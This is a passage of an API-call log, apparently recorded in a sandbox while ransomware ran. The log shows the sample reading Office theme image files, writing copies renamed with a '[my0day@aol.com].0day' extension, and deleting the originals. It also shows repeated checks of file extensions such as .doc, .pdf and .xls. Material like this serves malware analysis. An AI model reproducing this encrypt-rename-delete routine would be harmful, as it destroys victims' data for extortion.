Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.121] lstrlenW (lpString=".jpg") returned 4 [0044.121] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.122] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0044.122] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.122] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=31837) returned 1 [0044.122] CloseHandle (hObject=0x1d8) returned 1 [0044.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 0x20 [0044.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.122] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.122] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.123] GetLastError () returned 0x0 [0044.123] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x7c5d, lpOverlapped=0x0) returned 1 [0044.124] WriteFile (in: hFile=0x1fc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x7c60, lpOverlapped=0x0) returned 1 [0044.126] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.126] WriteFile (in: hFile=0x1fc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.126] SetEndOfFile (hFile=0x1fc) returned 1 [0044.126] CloseHandle (hObject=0x1fc) returned 1 [0044.126] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.126] SetEndOfFile (hFile=0x1d8) returned 1 [0044.127] CloseHandle (hObject=0x1d8) returned 1 [0044.127] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.127] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 1 [0044.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.127] lstrlenW (lpString=".doc") returned 4 [0044.128] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.128] lstrlenW (lpString=".docx") returned 5 [0044.128] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.128] lstrlenW (lpString=".pdf") returned 4 [0044.128] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.128] lstrlenW (lpString=".xls") returned 4 [0044.128] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.128] lstrlenW (lpString=".xlsx") returned 5 [0044.128] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.128] lstrlenW (lpString=".ppt") returned 4 [0044.128] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.128] lstrlenW (lpString=".zip") returned 4 [0044.128] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.128] lstrlenW (lpString=".rar") returned 4 [0044.128] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.128] lstrlenW (lpString=".bz2") returned 4 [0044.128] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.128] lstrlenW (lpString=".7z") returned 3 [0044.128] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.128] lstrlenW (lpString=".dbf") returned 4 [0044.128] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.128] lstrlenW (lpString=".1cd") returned 4 [0044.128] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.128] lstrlenW (lpString=".jpg") returned 4 [0044.128] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.128] lstrlenW (lpString=".doc") returned 4 [0044.128] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.128] lstrlenW (lpString=".docx") returned 5 [0044.129] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.129] lstrlenW (lpString=".pdf") returned 4 [0044.129] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.129] lstrlenW (lpString=".xls") returned 4 [0044.129] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.129] lstrlenW (lpString=".xlsx") returned 5 [0044.129] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.129] lstrlenW (lpString=".ppt") returned 4 [0044.129] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.129] lstrlenW (lpString=".zip") returned 4 [0044.129] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.129] lstrlenW (lpString=".rar") returned 4 [0044.129] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.129] lstrlenW (lpString=".bz2") returned 4 [0044.129] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.129] lstrlenW (lpString=".7z") returned 3 [0044.129] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.129] lstrlenW (lpString=".dbf") returned 4 [0044.129] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.129] lstrlenW (lpString=".1cd") returned 4 [0044.129] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0044.129] lstrlenW (lpString=".jpg") returned 4 [0044.129] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.129] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0044.129] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.129] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.130] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2722) returned 1 [0044.130] CloseHandle (hObject=0x1d8) returned 1 [0044.130] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 0x20 [0044.130] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.130] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.130] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.130] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.130] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.132] GetLastError () returned 0x0 [0044.132] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xaa2, lpOverlapped=0x0) returned 1 [0044.133] WriteFile (in: hFile=0x1fc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xab0, lpOverlapped=0x0) returned 1 [0044.134] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.134] WriteFile (in: hFile=0x1fc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.134] SetEndOfFile (hFile=0x1fc) returned 1 [0044.134] CloseHandle (hObject=0x1fc) returned 1 [0044.134] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.135] SetEndOfFile (hFile=0x1d8) returned 1 [0044.135] CloseHandle (hObject=0x1d8) returned 1 [0044.135] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.136] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 1 [0044.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.136] lstrlenW (lpString=".doc") returned 4 [0044.136] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.136] lstrlenW (lpString=".docx") returned 5 [0044.136] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.136] lstrlenW (lpString=".pdf") returned 4 [0044.136] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.136] lstrlenW (lpString=".xls") returned 4 [0044.136] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.136] lstrlenW (lpString=".xlsx") returned 5 [0044.136] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.136] lstrlenW (lpString=".ppt") returned 4 [0044.136] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.136] lstrlenW (lpString=".zip") returned 4 [0044.136] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.136] lstrlenW (lpString=".rar") returned 4 [0044.136] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.136] lstrlenW (lpString=".bz2") returned 4 [0044.136] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.136] lstrlenW (lpString=".7z") returned 3 [0044.136] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.136] lstrlenW (lpString=".dbf") returned 4 [0044.136] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.136] lstrlenW (lpString=".1cd") returned 4 [0044.137] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.137] lstrlenW (lpString=".jpg") returned 4 [0044.137] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.137] lstrlenW (lpString=".doc") returned 4 [0044.137] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.137] lstrlenW (lpString=".docx") returned 5 [0044.137] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.137] lstrlenW (lpString=".pdf") returned 4 [0044.137] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.137] lstrlenW (lpString=".xls") returned 4 [0044.137] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.137] lstrlenW (lpString=".xlsx") returned 5 [0044.137] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.137] lstrlenW (lpString=".ppt") returned 4 [0044.137] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.137] lstrlenW (lpString=".zip") returned 4 [0044.137] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.137] lstrlenW (lpString=".rar") returned 4 [0044.137] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.137] lstrlenW (lpString=".bz2") returned 4 [0044.137] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.137] lstrlenW (lpString=".7z") returned 3 [0044.137] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.137] lstrlenW (lpString=".dbf") returned 4 [0044.137] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.137] lstrlenW (lpString=".1cd") returned 4 [0044.137] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.137] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0044.137] lstrlenW (lpString=".jpg") returned 4 [0044.137] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.138] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0044.138] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.138] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.138] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=43276) returned 1 [0044.139] CloseHandle (hObject=0x1d8) returned 1 [0044.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 0x20 [0044.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.139] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.139] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.139] GetLastError () returned 0x0 [0044.139] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xa90c, lpOverlapped=0x0) returned 1 [0044.141] WriteFile (in: hFile=0x1fc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xa910, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xa910, lpOverlapped=0x0) returned 1 [0044.143] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.143] WriteFile (in: hFile=0x1fc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.143] SetEndOfFile (hFile=0x1fc) returned 1 [0044.143] CloseHandle (hObject=0x1fc) returned 1 [0044.143] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.143] SetEndOfFile (hFile=0x1d8) returned 1 [0044.144] CloseHandle (hObject=0x1d8) returned 1 [0044.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.144] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 1 [0044.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.145] lstrlenW (lpString=".doc") returned 4 [0044.145] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.145] lstrlenW (lpString=".docx") returned 5 [0044.145] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.145] lstrlenW (lpString=".pdf") returned 4 [0044.145] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.145] lstrlenW (lpString=".xls") returned 4 [0044.145] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.145] lstrlenW (lpString=".xlsx") returned 5 [0044.145] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.145] lstrlenW (lpString=".ppt") returned 4 [0044.145] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.145] lstrlenW (lpString=".zip") returned 4 [0044.145] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.145] lstrlenW (lpString=".rar") returned 4 [0044.145] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.145] lstrlenW (lpString=".bz2") returned 4 [0044.145] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.145] lstrlenW (lpString=".7z") returned 3 [0044.145] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.145] lstrlenW (lpString=".dbf") returned 4 [0044.145] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.145] lstrlenW (lpString=".1cd") returned 4 [0044.145] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.145] lstrlenW (lpString=".jpg") returned 4 [0044.145] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.145] lstrlenW (lpString=".doc") returned 4 [0044.145] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.146] lstrlenW (lpString=".docx") returned 5 [0044.146] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.146] lstrlenW (lpString=".pdf") returned 4 [0044.146] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.146] lstrlenW (lpString=".xls") returned 4 [0044.146] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.146] lstrlenW (lpString=".xlsx") returned 5 [0044.146] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.146] lstrlenW (lpString=".ppt") returned 4 [0044.146] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.146] lstrlenW (lpString=".zip") returned 4 [0044.146] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.146] lstrlenW (lpString=".rar") returned 4 [0044.146] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.146] lstrlenW (lpString=".bz2") returned 4 [0044.146] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.146] lstrlenW (lpString=".7z") returned 3 [0044.146] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.146] lstrlenW (lpString=".dbf") returned 4 [0044.146] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 